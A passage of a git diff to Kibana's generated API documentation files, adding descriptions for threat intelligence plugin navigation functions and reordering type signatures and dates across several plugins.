+ ], + "signature": [ + "\"indicators\"" + ], + "path": "x-pack/plugins/threat_intelligence/public/common/navigation/security_solution_links.ts", + "deprecated": false, + "isRequired": true + } + ], + "returnComment": [ + "a {@link TILinkItem }" + ], + "initialIsOpen": false + }, + { + "parentPluginId": "threatIntelligence", + "id": "def-public.getSecuritySolutionNavTab", + "type": "Function", + "tags": [], + "label": "getSecuritySolutionNavTab", + "description": [ + "\nGets the threat intelligence properties of a TI page for navigation in the old security solution navigation." + ], + "signature": [ + "(threatIntelligencePage: \"indicators\", basePath: string) => TINavTab" + ], + "path": "x-pack/plugins/threat_intelligence/public/common/navigation/security_solution_links.ts", + "deprecated": false, + "children": [ + { + "parentPluginId": "threatIntelligence", + "id": "def-public.getSecuritySolutionNavTab.$1", + "type": "string", + "tags": [], + "label": "threatIntelligencePage", + "description": [ + "the name of the threat intelligence page." + ], + "signature": [ + "\"indicators\"" + ], + "path": "x-pack/plugins/threat_intelligence/public/common/navigation/security_solution_links.ts", + "deprecated": false, + "isRequired": true + }, + { + "parentPluginId": "threatIntelligence", + "id": "def-public.getSecuritySolutionNavTab.$2", + "type": "string", + "tags": [], + "label": "basePath", + "description": [ + "the base path for links." + ], + "signature": [ + "string" + ], + "path": "x-pack/plugins/threat_intelligence/public/common/navigation/security_solution_links.ts", + "deprecated": false, + "isRequired": true + } + ], + "returnComment": [ + "a {@link TINavTab }" + ], + "initialIsOpen": false + } + ], "interfaces": [ { "parentPluginId": "threatIntelligence", 
@@ -58,7 +186,9 @@ "type": "Interface", "tags": [], "label": "ThreatIntelligenceSecuritySolutionContext", - "description": [], + "description": [ + "\nMethods exposed from the security solution to the threat intelligence application." + ], "path": "x-pack/plugins/threat_intelligence/public/types.ts", "deprecated": false, "children": [ @@ -68,7 +198,9 @@ "type": "Function", "tags": [], "label": "getFiltersGlobalComponent", - "description": [], + "description": [ + "\nGets the `FiltersGlobal` component for embedding a filter bar in the security solution application." + ], "signature": [ "() => React.ComponentType<{ children: React.ReactNode; }>" ], @@ -83,7 +215,9 @@ "type": "Object", "tags": [], "label": "licenseService", - "description": [], + "description": [ + "\nGet the user's license to drive the Threat Intelligence plugin's visibility." + ], "signature": [ "LicenseAware" ], 
@@ -95,7 +229,40 @@ } ], "enums": [], - "misc": [], + "misc": [ + { + "parentPluginId": "threatIntelligence", + "id": "def-public.THREAT_INTELLIGENCE_BASE_PATH", + "type": "string", + "tags": [], + "label": "THREAT_INTELLIGENCE_BASE_PATH", + "description": [ + "\nBase path for all the pages within the Threat Intelligence plugin." + ], + "signature": [ + "\"/threat_intelligence\"" + ], + "path": "x-pack/plugins/threat_intelligence/public/common/navigation/constants.ts", + "deprecated": false, + "initialIsOpen": false + }, + { + "parentPluginId": "threatIntelligence", + "id": "def-public.TIPageId", + "type": "Type", + "tags": [], + "label": "TIPageId", + "description": [ + "\nAll the IDs for the threat intelligence pages.\nThis needs to match the threat intelligence page entries in SecurityPageName` (x-pack/plugins/security_solution/common/constants.ts).\n\nExample to add more IDs:\n export type TIPageId = 'threat_intelligence-indicators' | 'threat_intelligence-feed';" + ], + "signature": [ + "\"threat_intelligence-indicators\"" + ], + "path": "x-pack/plugins/threat_intelligence/public/common/navigation/types.ts", + "deprecated": false, + "initialIsOpen": false + } + ], "objects": [] }, "server": { diff --git a/api_docs/threat_intelligence.mdx b/api_docs/threat_intelligence.mdx index 7ff74034992bd..9e2202a97d276 100644 --- a/api_docs/threat_intelligence.mdx +++ b/api_docs/threat_intelligence.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/threatIntelligence title: "threatIntelligence" image: https://source.unsplash.com/400x175/?github description: API docs for the threatIntelligence plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'threatIntelligence'] --- import threatIntelligenceObj from './threat_intelligence.devdocs.json'; 
@@ -21,10 +21,16 @@ Contact [Protections Experience Team](https://github.com/orgs/elastic/teams/prot | Public API count | Any count | Items lacking comments | Missing exports | |-------------------|-----------|------------------------|-----------------| -| 6 | 0 | 6 | 1 | +| 15 | 0 | 3 | 1 | ## Client +### Functions + + ### Interfaces +### Consts, variables and types + + diff --git a/api_docs/timelines.devdocs.json b/api_docs/timelines.devdocs.json index 041b50c3f880d..8172c6d16cbe6 100644 --- a/api_docs/timelines.devdocs.json +++ b/api_docs/timelines.devdocs.json @@ -772,7 +772,7 @@ "EuiDataGridColumn", ", \"id\" | \"display\" | \"displayAsText\" | \"initialWidth\"> & Pick<", "EuiDataGridColumn", - ", \"id\" | \"display\" | \"schema\" | \"actions\" | \"defaultSortDirection\" | \"displayAsText\" | \"initialWidth\" | \"isSortable\"> & { aggregatable?: boolean | undefined; tGridCellActions?: ", + ", \"id\" | \"schema\" | \"actions\" | \"display\" | \"defaultSortDirection\" | \"displayAsText\" | \"initialWidth\" | \"isSortable\"> & { aggregatable?: boolean | undefined; tGridCellActions?: ", "TGridCellAction", "[] | undefined; category?: string | undefined; columnHeaderType: ", { @@ -804,7 +804,7 @@ "EuiDataGridColumn", ", \"id\" | \"display\" | \"displayAsText\" | \"initialWidth\"> & Pick<", "EuiDataGridColumn", - ", \"id\" | \"display\" | \"schema\" | \"actions\" | \"defaultSortDirection\" | \"displayAsText\" | \"initialWidth\" | \"isSortable\"> & { aggregatable?: boolean | undefined; tGridCellActions?: ", + ", \"id\" | \"schema\" | \"actions\" | \"display\" | \"defaultSortDirection\" | \"displayAsText\" | \"initialWidth\" | \"isSortable\"> & { aggregatable?: boolean | undefined; tGridCellActions?: ", "TGridCellAction", "[] | undefined; category?: string | undefined; columnHeaderType: ", { 
@@ -2302,7 +2302,7 @@ "EuiDataGridColumn", ", \"id\" | \"display\" | \"displayAsText\" | \"initialWidth\"> & Pick<", "EuiDataGridColumn", - ", \"id\" | \"display\" | \"schema\" | \"actions\" | \"defaultSortDirection\" | \"displayAsText\" | \"initialWidth\" | \"isSortable\"> & { aggregatable?: boolean | undefined; tGridCellActions?: ", + ", \"id\" | \"schema\" | \"actions\" | \"display\" | \"defaultSortDirection\" | \"displayAsText\" | \"initialWidth\" | \"isSortable\"> & { aggregatable?: boolean | undefined; tGridCellActions?: ", "TGridCellAction", "[] | undefined; category?: string | undefined; columnHeaderType: ", { @@ -2849,11 +2849,11 @@ "label": "TGridModelForTimeline", "description": [], "signature": [ - "{ id: string; version: string | null; title: string; columns: (Pick<", + "{ columns: (Pick<", "EuiDataGridColumn", ", \"id\" | \"display\" | \"displayAsText\" | \"initialWidth\"> & Pick<", "EuiDataGridColumn", - ", \"id\" | \"display\" | \"schema\" | \"actions\" | \"defaultSortDirection\" | \"displayAsText\" | \"initialWidth\" | \"isSortable\"> & { aggregatable?: boolean | undefined; tGridCellActions?: ", + ", \"id\" | \"schema\" | \"actions\" | \"display\" | \"defaultSortDirection\" | \"displayAsText\" | \"initialWidth\" | \"isSortable\"> & { aggregatable?: boolean | undefined; tGridCellActions?: ", "TGridCellAction", "[] | undefined; category?: string | undefined; columnHeaderType: ", { 
@@ -2865,11 +2865,11 @@ }, "; description?: string | null | undefined; esTypes?: string[] | undefined; example?: string | number | null | undefined; format?: string | undefined; linkField?: string | undefined; placeholder?: string | undefined; subType?: ", "IFieldSubType", - " | undefined; type?: string | undefined; })[]; filters?: ", + " | undefined; type?: string | undefined; })[]; title: string; id: string; filters?: ", "Filter", "[] | undefined; dataViewId: string | null; sort: ", "SortColumnTimeline", - "[]; filterManager?: ", + "[]; version: string | null; filterManager?: ", { "pluginId": "data", "scope": "public", @@ -2881,7 +2881,7 @@ "EuiDataGridColumn", ", \"id\" | \"display\" | \"displayAsText\" | \"initialWidth\"> & Pick<", "EuiDataGridColumn", - ", \"id\" | \"display\" | \"schema\" | \"actions\" | \"defaultSortDirection\" | \"displayAsText\" | \"initialWidth\" | \"isSortable\"> & { aggregatable?: boolean | undefined; tGridCellActions?: ", + ", \"id\" | \"schema\" | \"actions\" | \"display\" | \"defaultSortDirection\" | \"displayAsText\" | \"initialWidth\" | \"isSortable\"> & { aggregatable?: boolean | undefined; tGridCellActions?: ", "TGridCellAction", "[] | undefined; category?: string | undefined; columnHeaderType: ", { @@ -3981,7 +3981,7 @@ "signature": [ "Pick<", "EuiDataGridColumn", - ", \"id\" | \"display\" | \"schema\" | \"actions\" | \"defaultSortDirection\" | \"displayAsText\" | \"initialWidth\" | \"isSortable\"> & { aggregatable?: boolean | undefined; tGridCellActions?: ", + ", \"id\" | \"schema\" | \"actions\" | \"display\" | \"defaultSortDirection\" | \"displayAsText\" | \"initialWidth\" | \"isSortable\"> & { aggregatable?: boolean | undefined; tGridCellActions?: ", "TGridCellAction", "[] | undefined; category?: string | undefined; columnHeaderType: ", { 
@@ -6542,7 +6542,7 @@ "signature": [ "Pick<", "EuiDataGridColumn", - ", \"id\" | \"display\" | \"schema\" | \"actions\" | \"defaultSortDirection\" | \"displayAsText\" | \"initialWidth\" | \"isSortable\"> & { aggregatable?: boolean | undefined; tGridCellActions?: ", + ", \"id\" | \"schema\" | \"actions\" | \"display\" | \"defaultSortDirection\" | \"displayAsText\" | \"initialWidth\" | \"isSortable\"> & { aggregatable?: boolean | undefined; tGridCellActions?: ", "TGridCellAction", "[] | undefined; category?: string | undefined; columnHeaderType: ", { @@ -6950,7 +6950,7 @@ "label": "TimelineKpiStrategyRequest", "description": [], "signature": [ - "{ id?: string | undefined; params?: ", + "{ params?: ", { "pluginId": "data", "scope": "common", @@ -6958,7 +6958,7 @@ "section": "def-common.ISearchRequestParams", "text": "ISearchRequestParams" }, - " | undefined; timerange: ", + " | undefined; id?: string | undefined; timerange: ", { "pluginId": "timelines", "scope": "common", diff --git a/api_docs/timelines.mdx b/api_docs/timelines.mdx index 484ea88ef8f94..5a8657bacff3c 100644 --- a/api_docs/timelines.mdx +++ b/api_docs/timelines.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/timelines title: "timelines" image: https://source.unsplash.com/400x175/?github description: API docs for the timelines plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'timelines'] --- import timelinesObj from './timelines.devdocs.json'; diff --git a/api_docs/transform.mdx b/api_docs/transform.mdx index ebc0f26bbc7af..e9be02b930e5a 100644 --- a/api_docs/transform.mdx +++ b/api_docs/transform.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/transform title: "transform" image: https://source.unsplash.com/400x175/?github description: API docs for the transform plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'transform'] --- import transformObj from './transform.devdocs.json'; 
diff --git a/api_docs/triggers_actions_ui.devdocs.json b/api_docs/triggers_actions_ui.devdocs.json index b14da2c49a52e..e8db880ec5e91 100644 --- a/api_docs/triggers_actions_ui.devdocs.json +++ b/api_docs/triggers_actions_ui.devdocs.json @@ -1508,7 +1508,7 @@ "label": "suspendedComponentWithProps", "description": [], "signature": [ - "(ComponentToSuspend: React.ComponentType, size: \"s\" | \"m\" | \"l\" | \"xl\" | \"xxl\" | undefined) => (props: T) => JSX.Element" + "(ComponentToSuspend: React.ComponentType, size: \"m\" | \"s\" | \"l\" | \"xl\" | \"xxl\" | undefined) => (props: T) => JSX.Element" ], "path": "x-pack/plugins/triggers_actions_ui/public/application/lib/suspended_component_with_props.tsx", "deprecated": false, @@ -1535,7 +1535,7 @@ "label": "size", "description": [], "signature": [ - "\"s\" | \"m\" | \"l\" | \"xl\" | \"xxl\" | undefined" + "\"m\" | \"s\" | \"l\" | \"xl\" | \"xxl\" | undefined" ], "path": "x-pack/plugins/triggers_actions_ui/public/application/lib/suspended_component_with_props.tsx", "deprecated": false, @@ -2071,7 +2071,7 @@ "label": "flyoutSize", "description": [], "signature": [ - "\"s\" | \"m\" | \"l\" | undefined" + "\"m\" | \"s\" | \"l\" | undefined" ], "path": "x-pack/plugins/triggers_actions_ui/public/types.ts", "deprecated": false @@ -2841,7 +2841,7 @@ "label": "ruleTypeRegistry", "description": [], "signature": [ - "{ list: () => ", + "{ get: (id: string) => ", { "pluginId": "triggersActionsUi", "scope": "public", @@ -2857,7 +2857,7 @@ "section": "def-common.RuleTypeParams", "text": "RuleTypeParams" }, - ">[]; get: (id: string) => ", + ">; list: () => ", { "pluginId": "triggersActionsUi", "scope": "public", @@ -2873,7 +2873,7 @@ "section": "def-common.RuleTypeParams", "text": "RuleTypeParams" }, - ">; register: (objectType: ", + ">[]; register: (objectType: ", { "pluginId": "triggersActionsUi", "scope": "public", 
@@ -2902,11 +2902,11 @@ "label": "actionTypeRegistry", "description": [], "signature": [ - "{ list: () => ", + "{ get: (id: string) => ", "ActionTypeModel", - "[]; get: (id: string) => ", + "; list: () => ", "ActionTypeModel", - "; register: (objectType: ", + "[]; register: (objectType: ", "ActionTypeModel", ") => void; has: (id: string) => boolean; }" ], @@ -3596,7 +3596,7 @@ "label": "setRuleProperty", "description": [], "signature": [ - "(key: Prop, value: ", + "(key: Prop, value: ", "SanitizedRule", "[Prop] | null) => void" ], @@ -4012,11 +4012,11 @@ "label": "actionTypeRegistry", "description": [], "signature": [ - "{ list: () => ", + "{ get: (id: string) => ", "ActionTypeModel", - "[]; get: (id: string) => ", + "; list: () => ", "ActionTypeModel", - "; register: (objectType: ", + "[]; register: (objectType: ", "ActionTypeModel", ") => void; has: (id: string) => boolean; }" ], @@ -4031,7 +4031,7 @@ "label": "ruleTypeRegistry", "description": [], "signature": [ - "{ list: () => ", + "{ get: (id: string) => ", { "pluginId": "triggersActionsUi", "scope": "public", @@ -4047,7 +4047,7 @@ "section": "def-common.RuleTypeParams", "text": "RuleTypeParams" }, - ">[]; get: (id: string) => ", + ">; list: () => ", { "pluginId": "triggersActionsUi", "scope": "public", @@ -4063,7 +4063,7 @@ "section": "def-common.RuleTypeParams", "text": "RuleTypeParams" }, - ">; register: (objectType: ", + ">[]; register: (objectType: ", { "pluginId": "triggersActionsUi", "scope": "public", @@ -4092,11 +4092,11 @@ "label": "alertsTableConfigurationRegistry", "description": [], "signature": [ - "{ list: () => ", + "{ get: (id: string) => ", "AlertsTableConfigurationRegistry", - "[]; get: (id: string) => ", + "; list: () => ", "AlertsTableConfigurationRegistry", - "; register: (objectType: ", + "[]; register: (objectType: ", "AlertsTableConfigurationRegistry", ") => void; has: (id: string) => boolean; }" ], 
@@ -4303,11 +4303,11 @@ "label": "ActionTypeRegistryContract", "description": [], "signature": [ - "{ list: () => ", + "{ get: (id: string) => ", "ActionTypeModel", - "[]; get: (id: string) => ", + "; list: () => ", "ActionTypeModel", - "; register: (objectType: ", + "[]; register: (objectType: ", "ActionTypeModel", ") => void; has: (id: string) => boolean; }" ], @@ -4337,11 +4337,11 @@ "label": "AlertsTableConfigurationRegistryContract", "description": [], "signature": [ - "{ list: () => ", + "{ get: (id: string) => ", "AlertsTableConfigurationRegistry", - "[]; get: (id: string) => ", + "; list: () => ", "AlertsTableConfigurationRegistry", - "; register: (objectType: ", + "[]; register: (objectType: ", "AlertsTableConfigurationRegistry", ") => void; has: (id: string) => boolean; }" ], @@ -4515,7 +4515,7 @@ "label": "RuleTypeRegistryContract", "description": [], "signature": [ - "{ list: () => ", + "{ get: (id: string) => ", { "pluginId": "triggersActionsUi", "scope": "public", @@ -4531,7 +4531,7 @@ "section": "def-common.RuleTypeParams", "text": "RuleTypeParams" }, - ">[]; get: (id: string) => ", + ">; list: () => ", { "pluginId": "triggersActionsUi", "scope": "public", @@ -4547,7 +4547,7 @@ "section": "def-common.RuleTypeParams", "text": "RuleTypeParams" }, - ">; register: (objectType: ", + ">[]; register: (objectType: ", { "pluginId": "triggersActionsUi", "scope": "public", diff --git a/api_docs/triggers_actions_ui.mdx b/api_docs/triggers_actions_ui.mdx index 9cb56a3b99d67..e764ea455f9e5 100644 --- a/api_docs/triggers_actions_ui.mdx +++ b/api_docs/triggers_actions_ui.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/triggersActionsUi title: "triggersActionsUi" image: https://source.unsplash.com/400x175/?github description: API docs for the triggersActionsUi plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'triggersActionsUi'] --- import triggersActionsUiObj from './triggers_actions_ui.devdocs.json'; 
diff --git a/api_docs/ui_actions.mdx b/api_docs/ui_actions.mdx index 41755cca634c2..93584be5eb047 100644 --- a/api_docs/ui_actions.mdx +++ b/api_docs/ui_actions.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/uiActions title: "uiActions" image: https://source.unsplash.com/400x175/?github description: API docs for the uiActions plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'uiActions'] --- import uiActionsObj from './ui_actions.devdocs.json'; diff --git a/api_docs/ui_actions_enhanced.mdx b/api_docs/ui_actions_enhanced.mdx index 3bd5fcc3d1103..fe876a3c404e5 100644 --- a/api_docs/ui_actions_enhanced.mdx +++ b/api_docs/ui_actions_enhanced.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/uiActionsEnhanced title: "uiActionsEnhanced" image: https://source.unsplash.com/400x175/?github description: API docs for the uiActionsEnhanced plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'uiActionsEnhanced'] --- import uiActionsEnhancedObj from './ui_actions_enhanced.devdocs.json'; diff --git a/api_docs/unified_search.devdocs.json b/api_docs/unified_search.devdocs.json index 756a40fd1398a..2e8d4636df681 100644 --- a/api_docs/unified_search.devdocs.json +++ b/api_docs/unified_search.devdocs.json @@ -285,9 +285,9 @@ "label": "props", "description": [], "signature": [ - "{ dataTestSubj?: string | undefined; query?: ", + "{ query?: ", "Query", - " | QT | undefined; filters?: ", + " | QT | undefined; dataTestSubj?: string | undefined; filters?: ", "Filter", "[] | undefined; savedQuery?: ", { 
@@ -407,12 +407,35 @@ { "parentPluginId": "unifiedSearch", "id": "def-public.ApplyGlobalFilterActionContext.embeddable", - "type": "Unknown", + "type": "Object", "tags": [], "label": "embeddable", "description": [], "signature": [ - "unknown" + { + "pluginId": "embeddable", + "scope": "public", + "docId": "kibEmbeddablePluginApi", + "section": "def-public.IEmbeddable", + "text": "IEmbeddable" + }, + "<", + { + "pluginId": "embeddable", + "scope": "common", + "docId": "kibEmbeddablePluginApi", + "section": "def-common.EmbeddableInput", + "text": "EmbeddableInput" + }, + ", ", + { + "pluginId": "embeddable", + "scope": "public", + "docId": "kibEmbeddablePluginApi", + "section": "def-public.EmbeddableOutput", + "text": "EmbeddableOutput" + }, + "> | undefined" ], "path": "src/plugins/unified_search/public/actions/apply_filter_action.ts", "deprecated": false @@ -1215,9 +1238,9 @@ "Omit", ", \"onChange\" | \"selectedOptions\" | \"options\" | \"isLoading\" | \"onSearchChange\">, \"placeholder\"> & Required, \"options\" | \"onChange\" | \"selectedOptions\" | \"isLoading\" | \"onSearchChange\">, \"placeholder\"> & Required, \"onChange\" | \"selectedOptions\" | \"options\" | \"isLoading\" | \"onSearchChange\">, \"placeholder\">> & { onChange: (indexPatternId?: string | undefined) => void; indexPatternId: string; onNoIndexPatterns?: (() => void) | undefined; }" + ", \"options\" | \"onChange\" | \"selectedOptions\" | \"isLoading\" | \"onSearchChange\">, \"placeholder\">> & { onChange: (indexPatternId?: string | undefined) => void; indexPatternId: string; onNoIndexPatterns?: (() => void) | undefined; }" ], "path": "src/plugins/unified_search/public/index_pattern_select/index_pattern_select.tsx", "deprecated": false, diff --git a/api_docs/unified_search.mdx b/api_docs/unified_search.mdx index 6eee52755d158..f18746f866ef7 100644 --- a/api_docs/unified_search.mdx +++ b/api_docs/unified_search.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/unifiedSearch title: "unifiedSearch" image: https://source.unsplash.com/400x175/?github description: API docs for the unifiedSearch plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'unifiedSearch'] --- import unifiedSearchObj from './unified_search.devdocs.json'; diff --git a/api_docs/unified_search_autocomplete.mdx b/api_docs/unified_search_autocomplete.mdx index c11101a1ca429..41e29f54eab13 100644 --- a/api_docs/unified_search_autocomplete.mdx +++ b/api_docs/unified_search_autocomplete.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/unifiedSearch-autocomplete title: "unifiedSearch.autocomplete" image: https://source.unsplash.com/400x175/?github description: API docs for the unifiedSearch.autocomplete plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'unifiedSearch.autocomplete'] --- import unifiedSearchAutocompleteObj from './unified_search_autocomplete.devdocs.json'; diff --git a/api_docs/url_forwarding.mdx b/api_docs/url_forwarding.mdx index e4081f5bdef08..ff5859fc1135c 100644 --- a/api_docs/url_forwarding.mdx +++ b/api_docs/url_forwarding.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/urlForwarding title: "urlForwarding" image: https://source.unsplash.com/400x175/?github description: API docs for the urlForwarding plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'urlForwarding'] --- import urlForwardingObj from './url_forwarding.devdocs.json'; diff --git a/api_docs/usage_collection.devdocs.json b/api_docs/usage_collection.devdocs.json index af132ce09f96c..fc4e370e41c2f 100644 --- a/api_docs/usage_collection.devdocs.json +++ b/api_docs/usage_collection.devdocs.json 
@@ -326,7 +326,61 @@ "\nRequest-scoped Elasticsearch client" ], "signature": [ - "{ name: string | symbol; transform: ", + "{ get: { (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "GetResponse", + ">; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "GetResponse", + ", unknown>>; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "GetResponse", + ">; }; delete: { (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "WriteResponseBase", + ">; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "WriteResponseBase", + ", unknown>>; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "WriteResponseBase", + ">; }; cluster: ", + "default", + "; eql: ", "default", "; search: { >; }; cluster: ", - "default", - "; eql: ", - "default", - "; create: { (this: That, params: ", + ">; }; create: { (this: That, params: ", "CreateRequest", " | ", "CreateRequest", @@ -394,7 +444,7 @@ "default", "; security: ", "default", - "; index: { (this: That, params: ", + "; name: string | symbol; index: { (this: That, params: ", "IndexRequest", " | ", "IndexRequest", 
@@ -420,33 +470,7 @@ "TransportRequestOptions", " | undefined): Promise<", "WriteResponseBase", - ">; }; get: { (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "GetResponse", - ">; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "GetResponse", - ", unknown>>; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "GetResponse", - ">; }; update: { (this: That, params: ", + ">; }; update: { (this: That, params: ", "UpdateRequest", " | ", "UpdateRequest", 
@@ -472,33 +496,7 @@ "TransportRequestOptions", " | undefined): Promise<", "UpdateResponse", - ">; }; delete: { (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "WriteResponseBase", - ">; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "WriteResponseBase", - ", unknown>>; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "WriteResponseBase", - ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", + ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; 
[kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", "default", "; helpers: ", "default", @@ -1458,6 +1456,8 @@ "TermvectorsResponse", ">; }; textStructure: ", "default", + "; transform: ", + "default", "; updateByQuery: { (this: That, params: ", "UpdateByQueryRequest", " | ", @@ -1866,7 +1866,7 @@ "\nPossible type values in the schema" ], "signature": [ - "\"boolean\" | \"text\" | \"date\" | \"keyword\" | \"long\" | \"double\" | \"short\" | \"float\" | \"integer\" | \"byte\"" + "\"boolean\" | \"date\" | \"keyword\" | \"text\" | \"long\" | \"double\" | \"short\" | \"float\" | \"integer\" | \"byte\"" ], "path": "node_modules/@types/kbn__analytics-client/index.d.ts", "deprecated": false, diff --git a/api_docs/usage_collection.mdx b/api_docs/usage_collection.mdx index 3f814b7b5f81a..1c296f04cec00 100644 --- a/api_docs/usage_collection.mdx +++ b/api_docs/usage_collection.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/usageCollection title: "usageCollection" image: https://source.unsplash.com/400x175/?github description: API docs for the usageCollection plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'usageCollection'] --- import usageCollectionObj from './usage_collection.devdocs.json'; diff --git a/api_docs/ux.mdx b/api_docs/ux.mdx index 1c8009686265d..1010db8d591a1 100644 --- a/api_docs/ux.mdx +++ b/api_docs/ux.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/ux title: "ux" image: https://source.unsplash.com/400x175/?github description: API docs for the ux plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'ux'] --- import uxObj from './ux.devdocs.json'; diff --git a/api_docs/vis_default_editor.devdocs.json b/api_docs/vis_default_editor.devdocs.json index cf5112446cd85..f12ad0fd98f63 100644 --- a/api_docs/vis_default_editor.devdocs.json +++ b/api_docs/vis_default_editor.devdocs.json @@ -310,7 +310,7 @@ "section": "def-public.DefaultEditorSize", "text": "DefaultEditorSize" }, - ") => 50 | 15 | 30" + ") => 15 | 50 | 30" ], "path": "src/plugins/vis_default_editor/public/editor_size.ts", "deprecated": false, diff --git a/api_docs/vis_default_editor.mdx b/api_docs/vis_default_editor.mdx index 273f8f5f1ed58..814d30ce38dac 100644 --- a/api_docs/vis_default_editor.mdx +++ b/api_docs/vis_default_editor.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/visDefaultEditor title: "visDefaultEditor" image: https://source.unsplash.com/400x175/?github description: API docs for the visDefaultEditor plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'visDefaultEditor'] --- import visDefaultEditorObj from './vis_default_editor.devdocs.json'; diff --git a/api_docs/vis_type_gauge.mdx b/api_docs/vis_type_gauge.mdx index a8ac2c8a41937..da5640fd3cfe4 100644 --- a/api_docs/vis_type_gauge.mdx +++ b/api_docs/vis_type_gauge.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/visTypeGauge title: "visTypeGauge" image: https://source.unsplash.com/400x175/?github description: API docs for the visTypeGauge plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'visTypeGauge'] --- import visTypeGaugeObj from './vis_type_gauge.devdocs.json'; diff --git a/api_docs/vis_type_heatmap.mdx b/api_docs/vis_type_heatmap.mdx index 5a6fc2649b02c..8ebe21443b746 100644 --- a/api_docs/vis_type_heatmap.mdx 
